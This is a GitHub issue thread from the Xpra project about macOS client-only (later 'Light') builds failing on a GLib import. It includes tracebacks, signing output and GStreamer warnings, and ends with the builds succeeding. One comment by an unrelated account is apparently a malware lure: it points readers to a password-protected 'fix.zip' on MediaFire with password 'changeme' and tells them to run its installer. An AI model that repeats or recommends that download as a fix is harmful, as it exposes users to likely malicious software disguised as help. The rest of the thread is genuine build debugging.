### ISSUE TITLE
macos client-only builds fail

### ISSUE THREAD

**Issue by totaam** [Xpra-org/xpra#4338]
Very strange one.
`CLIENT_ONLY=1 ./make-all.sh` fails with:
```
cat /Users/macos12/xpra/py2app.log
Traceback (most recent call last):
  File "/Users/macos12/xpra/./setup.py", line 2836, in <module>
    main()
  File "/Users/macos12/xpra/./setup.py", line 2832, in main
    setup(**setup_options)
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/setuptools/_distutils/core.py", line 185, in setup
    return run_commands(dist)
           ^^^^^^^^^^^^^^^^^^
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/setuptools/_distutils/core.py", line 201, in run_commands
    dist.run_commands()
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/setuptools/_distutils/dist.py", line 969, in run_commands
    self.run_command(cmd)
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/setuptools/dist.py", line 1234, in run_command
    super().run_command(command)
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/setuptools/_distutils/dist.py", line 988, in run_command
    cmd_obj.run()
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/py2app/build_app.py", line 987, in run
    self._run()
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/py2app/build_app.py", line 1217, in _run
    self.run_normal()
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/py2app/build_app.py", line 1436, in run_normal
    o = __import__(m1, fromlist=[m2])
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/macos12/xpra/xpra/server/base.py", line 13, in <module>
    from xpra.server.core import ServerCore
  File "/Users/macos12/xpra/xpra/server/core.py", line 27, in <module>
    from xpra.scripts.server import deadly_signal, clean_session_files, rm_session_dir
  File "/Users/macos12/xpra/xpra/scripts/server.py", line 56, in <module>
    from xpra.util.child_reaper import getChildReaper
  File "/Users/macos12/xpra/xpra/util/child_reaper.py", line 21, in <module>
    GLib = gi_import("GLib")
           ^^^^^^^^^^^^^^^^^
  File "/Users/macos12/xpra/xpra/os_util.py", line 54, in gi_import
    return importlib.import_module(f"gi.repository.{mod}")
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/macos12/gtk/inst/lib/python3.11/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<frozen importlib._bootstrap>", line 1204, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1176, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1147, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 676, in _load_unlocked
  File "<frozen importlib._bootstrap>", line 573, in module_from_spec
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/gi/importer.py", line 147, in create_module
    dynamic_module = load_overrides(introspection_module)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/gi/overrides/__init__.py", line 112, in load_overrides
    override_mod = importlib.import_module(override_package_name)
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/macos12/gtk/inst/lib/python3.11/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/gi/overrides/GLib.py", line 37, in <module>
    from gi import _option as option
  File "/Users/macos12/gtk/inst/lib/python3.11/site-packages/gi/_option.py", line 41, in <module>
    OPTION_CONTEXT_ERROR_QUARK = GLib.quark_to_string(GLib.option_error_quark())
                                                      ^^^^^^^^^^^^^^^^^^^^^^^^^
gi._error.GError: g-invoke-error-quark: Could not locate g_option_error_quark: dlopen(libglib-2.0.0.dylib, 0x0009): tried: 'libglib-2.0.0.dylib' (no such file), '/usr/local/lib/libglib-2.0.0.dylib' (no such file), '/usr/lib/libglib-2.0.0.dylib' (no such file), '/Users/macos12/xpra/libglib-2.0.0.dylib' (no such file) (1)
```

There aren't any major differences between regular and client-only builds:
https://github.com/Xpra-org/xpra/blob/b16a48f6137e08f43fc38b4d96d16d49b3392ed7/packaging/MacOS/make-app.sh#L27

Why would this have any effect on a GLib import!?

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by totaam** [comment]
Even more strange, on my x86_64 build system, this also triggers the problem:
`python3 -c "from xpra.os_util import gi_import;gi_import('GLib')"`
But on the arm64 build system, it does not!
Both systems fail with `CLIENT_ONLY=1`!

**Comment by totaam** [comment]
6747e7735e3af9b4dab2c667c242f0604b19824e just renames `Xpra-Client` to `Xpra-Light`, matching the naming used with MS Windows builds.

The build actually succeeds now, and runs "fine".
But there are still issues with #2441:
```
% LIGHT=1 ./sign-app.sh                        
using default login keychain /Users/antoine/Library/Keychains/login.keychain-db
*******************************************************************************
Signing
  so
  dylibs
  pyc
  Frameworks/bin
  Helpers
  MacOS/Xpra
  Xpra_NoDock.app
  Xpra.app
/Users/antoine/xpra/packaging/MacOS/image/Xpra-Light.app: code object is not signed at all
In subcomponent: /Users/antoine/xpra/packaging/MacOS/image/Xpra-Light.app/Contents/MacOS/Xpra-Client-bin
Verification
  extended attributes (should be empty)
  signature
/Users/antoine/xpra/packaging/MacOS/image/Xpra-Light.app: code object is not signed at all
  gatekeeper
assessments enabled
/Users/antoine/xpra/packaging/MacOS/image/Xpra-Light.app: rejected
source=no usable signature
*******************************************************************************
Copying Xpra.app to ~/Desktop
```

And also some `GLib` / `GStreamer` warnings to solve:
```
2026-04-09 19:39:47,583 xpra GTK3 client version 6.5-r40422 (g973702617c) beta
2026-04-09 19:39:47,583  uid=501 (antoine), gid=20 (staff)
2026-04-09 19:39:47,583  running with pid 48359 on Mac OS X 26.3
2026-04-09 19:39:47,583  cpython 3.11 arm64
2026-04-09 19:39:47,583  with 24.0GB of system memory

(<unknown>:48403): GStreamer-WARNING **: 19:39:47.841: External plugin loader failed. This most likely means that the plugin loader helper binary was not found or could not be run. You might need to set the GST_PLUGIN_SCANNER environment variable if your setup is unusual. This should normally not be required though.
objc[48403]: Class GstCocoaApplicationDelegate is implemented in both /Users/antoine/Desktop/Xpra.app/Contents/Frameworks/libgstreamer-1.0.0.dylib (0x10a3fc6b8) and /Users/antoine/gtk/inst/lib/libgstreamer-1.0.0.dylib (0x10ac686b8). This may cause spurious casting failures and mysterious crashes. One of the duplicates must be removed or renamed.

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_boxed: assertion 'G_TYPE_IS_BOXED (boxed_type)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: validate_pspec_to_install: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_ref_sink: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_unref: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_boxed: assertion 'G_TYPE_IS_BOXED (boxed_type)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: validate_pspec_to_install: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_ref_sink: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_unref: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_boxed: assertion 'G_TYPE_IS_BOXED (boxed_type)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: validate_pspec_to_install: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_ref_sink: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_unref: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_boxed: assertion 'G_TYPE_IS_BOXED (boxed_type)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: validate_pspec_to_install: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_ref_sink: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_param_spec_unref: assertion 'G_IS_PARAM_SPEC (pspec)' failed

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.845: g_object_new_is_valid_property: object class 'GstPadTemplate' has no property named 'caps'

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.846: ../../../../gtk/source/glib-2.86.4/gobject/gtype.c:4158: type id '0' is invalid

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.846: can't peek value table for type '<invalid>' which is not currently referenced

(process:48403): GLib-GObject-CRITICAL **: 19:39:47.846: ../../../../gtk/source/glib-2.86.4/gobject/gvalue.c:117: cannot initialize GValue with type '(null)', this type has no GTypeValueTable implementation
2026-04-09 19:39:47,848 No Audio
2026-04-09 19:39:47,848  Audio subsystem query failed, is GStreamer installed?
2026-04-09 19:39:48,995 
2026-04-09 19:39:48,995 failed to connect to tcp://192.168.0.10:10000/
2026-04-09 19:39:48,995  retrying for 20 seconds
2026-04-09 19:39:48,995 
2026-04-09 19:39:50,934 created unix domain sockets:
2026-04-09 19:39:50,934  '/Users/antoine/.xpra/clients/Antoines-MacBook-Air.local-48359'
2026-04-09 19:39:54,243  desktop size is 1470x956:
2026-04-09 19:39:54,243   antoines-macbook-air.local (389x253 mm - DPI: 96x96) workarea: 1470x833  at    0x33  
2026-04-09 19:39:54,243     monitor 1        (290x188 mm - DPI: 129x129)
2026-04-09 19:39:54,245  keyboard settings: layout=us
2026-04-09 19:39:54,829 Xpra seamless server version 6.5
2026-04-09 19:39:54,837 enabled remote logging
2026-04-09 19:39:54,908 running, 1 windows
2026-04-09 19:39:54,944 Attached to xpra server at tcp://192.168.0.10:10000/
2026-04-09 19:39:54,944  (press Control-C to detach)
```

**Comment by totaam** [comment]
Done, and the light builds are much smaller than the full fat ones:
```shell
$ du -sm beta/MacOS/arm64/Xpra*r40433.dmg 
83	beta/MacOS/arm64/Xpra-arm64-6.5-r40433.dmg
59	beta/MacOS/arm64/Xpra-Light-arm64-6.5-r40433.dmg
```

The download page has been updated to include links to the "Light" builds: https://github.com/Xpra-org/xpra/wiki/Download
